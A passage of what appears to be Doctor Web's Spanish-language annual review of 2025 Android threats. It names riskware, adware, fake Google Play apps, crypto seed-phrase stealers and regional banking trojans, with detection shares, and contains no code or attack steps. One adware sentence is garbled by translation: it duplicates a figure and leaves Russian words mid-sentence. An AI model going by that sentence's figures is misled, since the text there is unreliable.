href="https://vms.dr-web.es/search/?q=Tool.Packer&amp;lng=es"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Diez tipos de software potencialmente peligroso detectado en dispositivos en Android en el año 2025:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/10_2025_riskware_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/10_2025_riskware_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de aplicaciones en Android modificadas con la utilidad NP Manager. Esta utilidad contiene los módulos para la ofuscación y la protección del código de software, así como para esquivar su firma digital una vez modificado. La ofuscación añadida por la misma se usa en malware para dificultar su detección y análisis.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Tool.Androlua&amp;lng=es"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de algunas versiones potencialmente peligrosas del framework especializado para desarrollar programas en Android en lenguaje script de programación Lua. La lógica básica de aplicaciones Lua está en los scripts correspondientes que están cifrados y se descifran por el interpretados antes de ser ejecutados. Con frecuencia, este framework de forma predeterminada solicita acceso a múltiples permisos de sistema para su funcionamiento, así como para usar el servicio de posibilidades especiales del SO Android. Como resultado, los scripts Lua ejecutados a través del mismo pueden realizar varias acciones maliciosas según los permisos obtenidos.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Tool.LuckyPatcher&amp;lng=es"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Tool.LuckyPatcher&amp;lng=es"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Utilidad que permite modificar las aplicaciones en Android instaladas (crear los parches para los mismos) para modificar su lógica de funcionamiento o esquivar alguna restricción. Por ejemplo, con la misma los usuarios pueden intentar desactivar la comprobación del acceso root en programas bancarios o recibir los recursos ilimitados en los juegos. Para crear los parches, la utilidad descarga de Internet los scripts creados a propósito que cualquier persona interesada puede crear y añadir a la base común. La funcionalidad de estos scripts puede así mismo resultar maliciosa, por lo tanto, los parches creados pueden ser potencialmente peligrosos.  &lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Tool.SilentInstaller&amp;lng=es"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Plataforma potencialmente peligrosa que permite a las aplicaciones iniciar los archivos APK sin instalar los mismos. Crea un entorno de ejecución virtual que no afecta al sistema operativo básico. &lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Tool.Packer&amp;lng=es"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Utilidad comprimidora especializada para proteger las aplicaciones en Android contra modificación e ingeniería inversa. No es maliciosa, pero puede ser usada para proteger tanto los programas inofensivos como troyanos.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Adware&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;Entre adware en el año 2025 los más populares fueron las modificaciones de terceros de la aplicación WhatsApp detectadas como &lt;a href="https://vms.dr-web.es/search/?q=Adware.ModAd&amp;lng=es"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;. Estas modificaciones tienen implementada la funcionalidad para abrir enlaces en caso de trabajar con el messenger. Desde estos enlaces se realiza la redirección de los sitios web publicitados. Comparado con el año 2024, la parte de &lt;a href="https://vms.dr-web.es/search/?q=Adware.ModAd&amp;lng=es"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; del número total de adware detectado en dispositivos protegidos bajó del 47,45% al 26,90%.&lt;/p&gt;

&lt;p&gt;Los módulos &lt;a href="https://vms.dr-web.es/search/?q=Adware.Adpush&amp;lng=es"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt; incrustados en programas en Android, que visualizan notificaciones de publicidad, ocupan el segundo lugar, durante el año su actividad aumentó del 14,76% al 26,19%. El tercer lugar con un indicador del 8,88% lo ocuparon los representantes de la familia &lt;b&gt;Adware.Basement&lt;/b&gt; cuya parte sigue siendo casi la misma comparado con el año anterior. Estos programas pueden visualizar publicidad que lleva a los sitios web maliciosos.&lt;/p&gt;

&lt;p&gt;Las familias de adware &lt;a href="https://vms.dr-web.es/search/?q=Adware.Airpush&amp;lng=es"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; también fueron populares (su número de detecciones subió del 4,35% al 5,14%), &lt;a href="https://vms.dr-web.es/search/?q=Adware.Fictus&amp;lng=es"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt; (crecimiento del 3,29% al 6,21%), Adware.Youmi (crecimiento del 1,62% al 2,91%) así como &lt;b&gt;Adware.Youmi&lt;/b&gt; (рост с 1,62% до 2,91%) а также &lt;a href="https://vms.dr-web.es/search/?q=Adware.Leadbolt&amp;lng=es"&gt;&lt;b&gt;Adware.Leadbolt&lt;/b&gt;&lt;/a&gt; (crecimiento del 2,26% al 2,41%) y  &lt;b&gt;Adware.Jiubang&lt;/b&gt; (crecimiento del 1,70% до 2,38%).&lt;/p&gt;

&lt;p&gt;Diez tipos de adware más populares detectados en dispositivos en Android en el año 2025:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/11_2025_adware_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/11_2025_adware_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.ModAd&amp;lng=es"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de algunas versiones modificadas (mods) del messenger WhatsApp cuyas funciones tienen implementado un código para cargar enlaces específicos mediante visualización web durante el uso del messenger. Desde estas direcciones de Internet se redirige a los sitios web publicitados — por ejemplo, los casinos en línea y operadores de apuestas, sitios web para adultos&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.AdPush&amp;lng=es"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.Adpush&amp;lng=es"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.AdPush&amp;lng=es"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.39.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Módulos de publicidad que pueden ser integrados en programas en Android. Visualizan notificaciones de publicidad que engañan a usuarios. Por ejemplo, estas notificaciones pueden parecer mensajes del sistema operativo. Además, estos módulos recopilan algunos datos privados, y también pueden cargar otras aplicaciones e iniciar su instalación.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Aplicaciones que visualizan publicidad importuna que con frecuencia lleva a los sitios web maliciosos y fraudulentos. Tienen la base de código común con programas no deseados &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeMoney&amp;lng=es"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.Fictus&amp;lng=es"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un módulo de publicidad que los malintencionados incrustan en versiones clones de juegos populares en Android y programas. Su integración en programas se realiza con un comprimidor especializado net2share. Las copias de software creadas de esta forma se propagan a través de varios catálogos de aplicaciones y visualizan publicidad importuna una vez instaladas.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.Airpush&amp;lng=es"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Complementos integrados en aplicaciones en Android que muestran varios tipos de publicidad. Según la versión y la modificación, puede tratarse de notificaciones publicitarias, ventanas emergentes o banners. Mediante estos módulos, los delincuentes suelen propagar malware ofreciendo instalar algún tipo de software. Además, estos módulos transfieren información confidencial de varios tipos a un servidor remoto.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.Youmi&amp;lng=es"&gt;&lt;b&gt;Adware.Youmi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de un módulo de publicidad no deseado que coloca accesos directos de publicidad en la pantalla principal de dispositivos en Android.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Jiubang.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Software de publicidad no deseado para dispositivos en Android que al instalar aplicaciones visualiza un banner con software recomendado para la instalación.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.Inmobi&amp;lng=es"&gt;&lt;b&gt;Adware.Inmobi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de algunas versiones de adware SDK Inmobi capaces de realizar llamadas telefónicas y añadir eventos al calendario de dispositivos en Android.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Amenazas en Google Play&lt;/h3&gt;

&lt;p&gt;En 2025, el laboratorio antivirus de la empresa Doctor Web detectó en el catálogo de Google Play más de 180 tipos de malware, no deseados y publicitarios, que en conjunto fueron instalados al menos 2.165.040 veces. Entre ellos hubo varias modificaciones de los troyanos &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4215&lt;/b&gt;, que ocultaban su presencia en los dispositivos infectados y mostraban publicidad superpuesta a la interfaz del sistema operativo y de otras aplicaciones. Estos troyanos se propagaban haciéndose pasar por editores de fotos, aplicaciones para fotos, grabación de vídeo y otro software.&lt;/p&gt;

&lt;div class="img img-two mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/12_Android.HiddenAds.4215_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/12_Android.HiddenAds.4215_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/13_Android.HiddenAds.4213_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/13_Android.HiddenAds.4213_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Los programas Time Shift Cam y Fusion Collage Editor fueron troyanos publicitarios &lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Haciéndose pasar por software oficial de la criptobolsa dYdX y de las plataformas blockchain Raydium y Aerodrome Finance, los ciberdelincuentes propagaban los troyanos &lt;a href="https://vms.dr-web.es/search/?q=Android.CoinSteal&amp;lng=es"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.202&lt;/b&gt;, &lt;a href="https://vms.dr-web.es/search/?q=Android.CoinSteal&amp;lng=es"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.203&lt;/b&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.CoinSteal&amp;lng=es"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.206&lt;/b&gt;, que robaban criptomoneda.&lt;/p&gt;

&lt;div class="img img-two mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/14_Android.CoinSteal.203_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/14_Android.CoinSteal.203_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/15_Android.CoinSteal.202_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/15_Android.CoinSteal.202_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;En los programas Raydium y Dydx Exchange se ocultaba software troyano para robar criptomoneda&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Este malware ofrecía a los usuarios introducir una frase mnemotécnica supuestamente para conectar un monedero de criptomonedas; sin embargo, en realidad los datos introducidos se enviaban a los delincuentes. Para confundir aún más a las posibles víctimas, los formularios para introducir la frase mnemotécnica podían estar camuflados como solicitudes procedentes de otras plataformas de criptomonedas.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/16_seed_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/16_seed_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/17_seed_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/17_seed_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Android.CoinSteal.206&lt;/b&gt; visualiza un formulario phishing supuestamente en nombre de la criptobolsa PancakeSwap y solicita una frase mnemotécnica para acceder al criptomonedero &lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Durante el año nuestros expertos detectaron en Google Play más de 80 tipos de malware de la familia &lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; que suscribe a los usuarios a servicios de pago. Se propagaban camuflados como software de varios tipos, incluidos los messengers, programas para hacer fotos, utilidades del sistema, editores de imágenes y programas para trabajar con documentos.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/18_Android.Joker.2494_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/18_Android.Joker.2494_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/19_Android.Joker.2496_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/19_Android.Joker.2496_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Unos ejemplos de troyanos detectados, &lt;b&gt;Android.Joker&lt;/b&gt;: &lt;b&gt;Android.Joker.2494&lt;/b&gt; se propagaba como messenger File Text Messages, y &lt;b&gt;Android.Joker.2496&lt;/b&gt; — como utilidad Useful Cleaner para optimizar el funcionamiento del smartphone&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Los ciberdelincuentes volvieron a propagar todo tipo de programas falsos &lt;a href="https://vms.dr-web.es/search/?q=Android.FakeApp&amp;lng=es"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, utilizados en diversas estafas. Su principal función es cargar páginas web objetivo. Algunos de estos troyanos se hacían pasar por software de temática financiera. Dichas aplicaciones cargaban sitios web fraudulentos supuestamente relacionados con inversiones y ganancias en línea, así como sitios de phishing. Otros programas falsos &lt;a href="https://vms.dr-web.es/search/?q=Android.FakeApp&amp;lng=es"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; se distribuían bajo la apariencia de juegos y, en determinadas condiciones, podían cargar sitios de casinos en línea y casas de apuestas. En total, registramos más de 100 aplicaciones de este tipo en Google Play.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/20_Android.FakeApp.1840_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/20_Android.FakeApp.1840_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/21_Android.FakeApp.1863_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/21_Android.FakeApp.1863_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Unos ejemplos de aplicaciones falsas &lt;b&gt;Android.FakeApp&lt;/b&gt;. El troyano &lt;b&gt;Android.FakeApp.1863&lt;/b&gt;, que se ocultaba en el programa TPAO, estaba destinado para usuarios turcos y les proponía administrar sus depósitos e ingresos. Y el troyano ,&lt;b&gt;Android.FakeApp.1840&lt;/b&gt; se propagaba como juego Pino Bounce y podía cargar un sitio web de un casino en línea&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Los analistas de virus de Doctor Web también detectaron nuevo software publicitario no deseado &lt;a href="https://vms.dr-web.es/search/?q=Adware.Adpush&amp;lng=es"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21912&lt;/b&gt; que se ocultaba en el programa Coin News Promax con información sobre criptomoneda. &lt;a href="https://vms.dr-web.es/search/?q=Adware.Adpush&amp;lng=es"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21912&lt;/b&gt; visualiza notificaciones al pulsar las cuales en WebView se carga un enlace establecido por el servidor C2.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/22_Adware.Adpush.21912_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/22_Adware.Adpush.21912_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;La aplicación Coin News Promax de Google Play era adware &lt;b&gt;Adware.Adpush.21912&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Además, nuestros expertos detectaron un programa no deseado &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeMoney&amp;lng=es"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt; que se difundía como aplicación Zeus Jackpot Mania. En la misma, los usuarios obtenían recompensas virtuales de forma lúdica, que supuestamente podían convertir más tarde en dinero real y retirar desde la aplicación.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/23_Program.FakeMoney.16_1_Zeus Jackpot Mania_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/23_Program.FakeMoney.16_1_Zeus Jackpot Mania_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;El programa Zeus Jackpot Mania era una aplicación no deseada &lt;b&gt;Program.FakeMoney.16&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Para «retirar» el dinero, el programa solicitaba algunos datos, pero los usuarios no recibían ningunos pagos.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/24_Program.FakeMoney.16_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/24_Program.FakeMoney.16_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Program.FakeMoney.16&lt;/b&gt; pide indicar el nombre completo del usuario y la información sobre la cuenta bancaria&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Troyanos bancarios&lt;/h3&gt;

&lt;p&gt;Según las estadísticas de detección de Dr.Web Security Space para dispositivos móviles, en 2025 la proporción de troyanos bancarios sobre el total de malware detectado fue del 6,94 %, ligeramente por encima del 6,29 % registrado el año anterior. Durante los tres primeros meses, la actividad de los troyanos bancarios se mantuvo aproximadamente en el mismo nivel; no obstante, a principios del segundo trimestre aumentó de forma notable. Posteriormente, empezó a disminuir de manera gradual, alcanzando el mínimo anual en julio. A partir de agosto, el número de detecciones volvió a crecer y ya en octubre alcanzó su máximo. Hacia finales de año se observó un nuevo descenso.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/26_banker_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/26_banker_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;En 2025, los delincuentes siguieron utilizando varias familias populares de troyanos bancarios en los ataques llevados a cabo. Entre las más activas se encontraban las amenazas &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot.Coper&amp;lng=en" target="_blank"&gt;Coper&lt;/a&gt;, &lt;b&gt;Android.BankBot.Ermac&lt;/b&gt; y algunas otras. Además, se detectaron nuevas versiones de los troyanos &lt;a href="https://vms.drweb.com/virus/?i=29204494&amp;lng=en" target="_blank"&gt;NGate&lt;/a&gt;, que utilizan tecnología NFC para robar dinero. Este malware transmite a los atacantes los datos del chip NFC de los dispositivos infectados, lo que permite a los estafadores retirar fondos de las cuentas de las víctimas en cajeros automáticos o realizar compras mediante pagos sin contacto, sin necesidad de una participación adicional por parte de los usuarios. Entre las modificaciones más activas se encontraban &lt;b&gt;Android.Banker.NGate.8&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.17&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.5.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;También continuó la propagación de &lt;b&gt;Android.SpyMax&lt;/b&gt;, malware con funciones de espionaje basadas en el código fuente, ya de acceso público, del troyano RAT SpyNote. Los ciberdelincuentes los utilizan, entre otras cosas, como troyanos bancarios. No obstante, la actividad de &lt;b&gt;Android.SpyMax&lt;/b&gt; bajó en comparación con 2024. Este malware representó el 12,35 % de las detecciones de troyanos bancarios, frente al 32,04 % registrado el año anterior.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/27_Android.SpyMax_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/27_Android.SpyMax_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;En 2025, los usuarios rusos se enfrentaron con mayor frecuencia a varios troyanos bancarios que, según la clasificación de la empresa Doctor Web, forman parte de la amplia familia Mamont (&lt;b&gt;Android.Banker.790.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.Mamont.3.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.Mamont.28.origin&lt;/b&gt;). Esta familia incluye una gran variedad de aplicaciones maliciosas que los creadores de malware siguen modificando y desarrollando activamente. Estos programas interceptan SMS con códigos de un solo uso de entidades financieras y roban datos de tarjetas bancarias y otra información confidencial.&lt;/p&gt;

&lt;p&gt;A lo largo del año, nuestros especialistas también observaron actividad de troyanos bancarios dirigidos a residentes de Uzbekistán y de países limítrofes, como Armenia, Azerbaiyán y Kirguistán. En los dispositivos protegidos se detectaron con mayor frecuencia &lt;b&gt;Android.Banker.951.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.881.origin&lt;/b&gt; y &lt;b&gt;Android.Banker.963.origin&lt;/b&gt;, que roban SMS de verificación enviados por entidades financieras. Los ciberdelincuentes modifican constantemente este tipo de malware para dificultar su detección. Los usuarios de Turquía fueron atacados con mayor frecuencia por los troyanos bancarios &lt;b&gt;Android.BankBot.Coper.12.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.5685&lt;/b&gt; y &lt;b&gt;Android.Banker.864.origin&lt;/b&gt;, que también son capaces de sustraer el contenido de los mensajes SMS.&lt;/p&gt;

&lt;p&gt;Al mismo tiempo, los residentes de Irán se enfrentaron a los troyanos &lt;b&gt;Android.BankBot.1190.origin&lt;/b&gt;, &lt;b&gt;Android.BankBot.1191.origin&lt;/b&gt; y sus modificaciones. Este malware roba la información bancaria de los mensajes SMS: buscan en ellos datos de tarjetas bancarias, cuentas de la víctima, saldo disponible, transacciones realizadas, etc., y posteriormente los envía a los delincuentes. Además, recopilan información de los contactos de la agenda y pueden enviar SMS por orden de los atacantes.&lt;/p&gt;

&lt;p&gt;Los residentes de numerosos países del Sudeste Asiático y de la región Asia-Pacífico, incluidos Indonesia y Corea del Sur, fueron atacados por el troyano &lt;b&gt;Android.BankBot.Remo.1.origin&lt;/b&gt;. Este malware utiliza funciones especiales de accesibilidad (Accessibility Services) para robar los datos de aplicaciones bancarias y de monederos de criptomonedas instaladas en los dispositivos infectados. Además del troyano Remo, los usuarios surcoreanos también se enfrentaron a los troyanos &lt;b&gt;Android.BankBot.15140&lt;/b&gt;, &lt;b&gt;Android.BankBot.Ermac.6.origin&lt;/b&gt; y GoldDigger (&lt;b&gt;Android.BankBot.GoldDigger.9&lt;/b&gt;, &lt;b&gt;Android.BankBot.GoldDigger.11&lt;/b&gt;).&lt;/p&gt;

&lt;p&gt;El malware GoldDigger también se utilizó contra usuarios de Indonesia y Tailandia. Por su parte, el troyano bancario &lt;b&gt;Android.BankBot.Gigabud.1.origin&lt;/b&gt; se empleó contra clientes de entidades financieras de Indonesia y Malasia. Al mismo tiempo, los delincuentes continuaron usando los troyanos MoqHao en ataques dirigidos a la audiencia japonesa. Se propagaron diversas modificaciones de MoqHao, como &lt;b&gt;Android.Banker.672.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.5063&lt;/b&gt;, &lt;b&gt;Android.Banker.740.origin&lt;/b&gt; y otras.&lt;/p&gt;

&lt;p&gt;Uno de los troyanos bancarios dirigidos a residentes de la India fue &lt;b&gt;Android.Banker.6209&lt;/b&gt;. Este troyano imita la apariencia de aplicaciones bancarias legítimas con el fin de robar datos de los usuarios, como nombres, números de tarjetas bancarias y códigos de seguridad CVV. Además, utiliza los dispositivos infectados para la minería encubierta de la criptomoneda Monero. También volvió a observarse la propagación de los troyanos bancarios RewardSteal, como &lt;b&gt;Android.Banker.814.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.913.origin&lt;/b&gt; y &lt;b&gt;Android.Banker.5132&lt;/b&gt;. Para robar datos bancarios, estos se camuflan como software supuestamente relacionado con entidades financieras indias, por ejemplo ICICI, SBI, Axis y PM Kisan.&lt;/p&gt;

&lt;p&gt;Los propietarios brasileños de dispositivos Android fueron atacados con mayor frecuencia por el malware &lt;b&gt;Android.BankBot.1183.origin&lt;/b&gt;, así como por varios representantes de la familia NGate: &lt;b&gt;Android.Banker.NGate.8&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.9&lt;/b&gt; y &lt;b&gt;Android.Banker.NGate.14&lt;/b&gt;.&lt;/p&gt;

